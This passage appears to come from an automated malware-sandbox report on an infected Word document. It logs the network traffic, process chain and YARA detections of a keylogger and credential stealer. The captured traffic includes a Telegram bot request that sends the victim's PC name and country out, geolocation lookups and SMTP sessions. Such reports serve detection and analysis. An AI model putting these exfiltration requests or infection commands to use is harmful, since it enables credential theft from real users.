2025-01-14 07:08:48 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	52785	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:50 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:50 UTC	863	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153319 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEulUCf5tRUp%2FFFxhFMbGoxm39mmsWT47Nxaar%2BWb8ckCmw8Ph9%2BxklEWzaciXGLX7bxII%2FvwkOkcB8FR9UXVpTSSENpjPTzS%2BpUTFnSQQWOH%2B%2FFrrh6wh3ih0xzQPOvgN1LRQMX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcc0ed96d1899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1663&rtt_var=628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1737061&cwnd=153&unsent_bytes=0&cid=a80ec56d06886429&ts=135&x=0"
2025-01-14 07:08:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	52787	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:51 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:51 UTC	867	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153320 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYFz1%2BhkH%2FUxzl4lBoSvE9vNobunLTtc46sz%2B6HuwqyV2C1HTfD55cY6Wg4tN%2FaLGBnL%2FiBWpp9vpSF3XOm3dq5y4T3%2BqAQE%2FaGLVxM%2FK%2F3sOUe8sScHZNh8kS5AFHzwHXzHgGXq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcc17cdb71899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1567&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1784841&cwnd=153&unsent_bytes=0&cid=3bbbd757c585ce5c&ts=130&x=0"
2025-01-14 07:08:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	52790	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:53 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:53 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153322 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSuvSzrBy5IfMlv5OjbzRoMCrdRGzg%2BbYT9MCPZBRETdO47mJpH6RtYXaL5OnePIP5PkGbW92z70P2XUvunYPesGBa8kmBQrHdy1E3uC%2FVtY0P8jUb5FMpJcbiAsDT%2BD5PdRiEzJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcc20af6a7293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1909&rtt_var=725&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1501285&cwnd=158&unsent_bytes=0&cid=e0639cc79efe26fe&ts=138&x=0"
2025-01-14 07:08:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	52792	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:54 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:54 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153323 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1eWcrBYrVbAMw6mh6RHYkGWJ2iaP3eDkJxp4Kd6J6ogw6Bcp1pRA8ZjmE9ejZTtCl4H73IhDiOF9CLDzITsmwz0pTUK%2FhbbUMCFXOFQoBGkOH64M056UO7TqxazOToF3dlBo%2BptF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcc29dccb4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1540&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1828428&cwnd=221&unsent_bytes=0&cid=a2d29cc76385c24d&ts=149&x=0"
2025-01-14 07:08:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	52795	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:56 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:56 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153325 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZE2bNGhlnQnmHAe48LPL%2BUjC%2BP0vzeK9qRib01aAhfSbv8g%2F2CQ0d44gve47ObQUDqcvPCJ1eyT5Pzv%2Bv84j%2B2NRnNqGHyv4csiVI6PHDZqmeS5Jbnj4p%2BVanIwWbH8udIAAWc3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcc32dc250fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1469&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1907250&cwnd=252&unsent_bytes=0&cid=4aac1990477cb835&ts=152&x=0"
2025-01-14 07:08:56 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	52796	149.154.167.220	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:56 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:02:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-14 07:08:57 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 14 Jan 2025 07:08:57 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 07:08:57 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 14, 2025 08:08:46.929449081 CET	587	52774	46.151.208.21	192.168.2.4	220 host.ibtikarat.net ESMTP Exim 4.98 Tue, 14 Jan 2025 10:08:44 +0300
Jan 14, 2025 08:08:46.929691076 CET	52774	587	192.168.2.4	46.151.208.21	EHLO 585948
Jan 14, 2025 08:08:47.224791050 CET	587	52774	46.151.208.21	192.168.2.4	250-host.ibtikarat.net Hello 585948 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 14, 2025 08:08:47.227596998 CET	52774	587	192.168.2.4	46.151.208.21	STARTTLS
Jan 14, 2025 08:08:47.504028082 CET	587	52774	46.151.208.21	192.168.2.4	220 TLS go ahead
Jan 14, 2025 08:08:53.802042007 CET	587	52789	46.151.208.21	192.168.2.4	220 host.ibtikarat.net ESMTP Exim 4.98 Tue, 14 Jan 2025 10:08:51 +0300
Jan 14, 2025 08:08:53.802196026 CET	52789	587	192.168.2.4	46.151.208.21	EHLO 585948
Jan 14, 2025 08:08:54.092839956 CET	587	52789	46.151.208.21	192.168.2.4	250-host.ibtikarat.net Hello 585948 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 14, 2025 08:08:54.093002081 CET	52789	587	192.168.2.4	46.151.208.21	STARTTLS
Jan 14, 2025 08:08:54.366542101 CET	587	52789	46.151.208.21	192.168.2.4	220 TLS go ahead
Jan 14, 2025 08:08:56.076009989 CET	587	52794	46.151.208.21	192.168.2.4	220 host.ibtikarat.net ESMTP Exim 4.98 Tue, 14 Jan 2025 10:08:54 +0300
Jan 14, 2025 08:08:56.076334000 CET	52794	587	192.168.2.4	46.151.208.21	EHLO 585948
Jan 14, 2025 08:08:56.375001907 CET	587	52794	46.151.208.21	192.168.2.4	250-host.ibtikarat.net Hello 585948 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 14, 2025 08:08:56.375519991 CET	52794	587	192.168.2.4	46.151.208.21	STARTTLS
Jan 14, 2025 08:08:56.648066044 CET	587	52794	46.151.208.21	192.168.2.4	220 TLS go ahead
Jan 14, 2025 08:09:02.700980902 CET	587	52814	46.151.208.21	192.168.2.4	220 host.ibtikarat.net ESMTP Exim 4.98 Tue, 14 Jan 2025 10:09:00 +0300
Jan 14, 2025 08:09:02.701210022 CET	52814	587	192.168.2.4	46.151.208.21	EHLO 585948
Jan 14, 2025 08:09:02.995007992 CET	587	52814	46.151.208.21	192.168.2.4	250-host.ibtikarat.net Hello 585948 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 14, 2025 08:09:02.995279074 CET	52814	587	192.168.2.4	46.151.208.21	STARTTLS
Jan 14, 2025 08:09:03.272272110 CET	587	52814	46.151.208.21	192.168.2.4	220 TLS go ahead
Jan 14, 2025 08:09:04.458950996 CET	587	52830	46.151.208.21	192.168.2.4	220 host.ibtikarat.net ESMTP Exim 4.98 Tue, 14 Jan 2025 10:09:02 +0300
Jan 14, 2025 08:09:04.459332943 CET	52830	587	192.168.2.4	46.151.208.21	EHLO 585948
Jan 14, 2025 08:09:04.761010885 CET	587	52830	46.151.208.21	192.168.2.4	250-host.ibtikarat.net Hello 585948 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 14, 2025 08:09:04.761173010 CET	52830	587	192.168.2.4	46.151.208.21	STARTTLS
Jan 14, 2025 08:09:05.034001112 CET	587	52830	46.151.208.21	192.168.2.4	220 TLS go ahead
Jan 14, 2025 08:09:10.523623943 CET	587	52866	46.151.208.21	192.168.2.4	220 host.ibtikarat.net ESMTP Exim 4.98 Tue, 14 Jan 2025 10:09:08 +0300
Jan 14, 2025 08:09:10.523766041 CET	52866	587	192.168.2.4	46.151.208.21	EHLO 585948
Jan 14, 2025 08:09:10.830905914 CET	587	52866	46.151.208.21	192.168.2.4	250-host.ibtikarat.net Hello 585948 [8.46.123.189] 250-SIZE 52428800 250-LIMITS MAILMAX=100 RCPTMAX=150 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 14, 2025 08:09:10.831171036 CET	52866	587	192.168.2.4	46.151.208.21	STARTTLS
Jan 14, 2025 08:09:11.102493048 CET	587	52866	46.151.208.21	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	02:08:04
Start date:	14/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x970000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:08:11
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\brightness.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\brightness.exe
Imagebase:	0x400000
File size:	1'443'328 bytes
MD5 hash:	8D3E16CB3CE3940E87A322FBEEAB419F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1892098003.000000007FD70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1863488781.0000000002274000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:08:15
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:08:15
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:08:17
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:08:17
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:08:18
Start date:	14/01/2025
Path:	C:\Users\Public\Libraries\npratlsN.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\npratlsN.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000001.1859265751.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, Author: 